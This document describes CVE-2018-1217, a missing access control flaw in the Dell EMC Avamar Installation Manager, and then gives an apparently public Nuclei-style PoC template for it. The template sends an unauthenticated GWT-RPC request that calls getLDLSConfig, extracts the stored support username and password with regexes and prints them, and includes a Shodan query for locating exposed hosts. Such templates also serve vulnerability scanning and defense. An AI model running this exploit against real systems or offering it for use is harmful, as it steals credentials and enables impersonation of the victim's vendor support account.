Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
PoC代码[已公开]
id: CVE-2018-1217
info:
name: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
author: daffainfo
severity: critical
description: |
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
reference:
- https://www.exploit-db.com/exploits/44441
- https://nvd.nist.gov/vuln/detail/CVE-2018-1217
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-1217
epss-score: 0.65433
epss-percentile: 0.98402
cwe-id: CWE-862
cpe: cpe:2.3:a:dell:emc_avamar:*:*:*:*:*:*:*:*, cpe:2.3:a:dell:emc_integrated_data_protection_appliance:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dell
product: emc_avamar,emc_integrated_data_protection_appliance
shodan-query: title:"AVAMAR"
tags: cve,cve2018,dell,avamar,vkev,vuln
http:
- raw:
- |
POST /avi/avigui/avigwt HTTP/1.1
Host: {{Hostname}}
X-Gwt-Permutation: {{randstr}}
X-Gwt-Module-Base: https://{{Hostname}}/avi/avigui/
Content-Type: text/x-gwt-rpc; charset=UTF-8
7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|
matchers:
- type: dsl
dsl:
- 'contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword")'
- 'status_code == 200'
condition: and
extractors:
- type: regex
name: username
group: 1
internal: true
regex:
- 'emcsupportUsername\\":\\"(.*?)\\"'
- type: regex
name: password
group: 1
internal: true
regex:
- 'emcsupportPassword\\":\\"(.*?)\\"'
- type: dsl
dsl:
- '"Username: " + username + " Password: " + password'
# digest: 4a0a004730450221008caa6c0d8e8b1ff2e6bbb98775ff18e3d93e6b8f3ae4dc02099a936d27736af5022072f086dea2a5558fb52af50fb60859aeec8b9bf16f99831fe6903ec78e21fccc:922c64590222798bb761d5b6d8e72950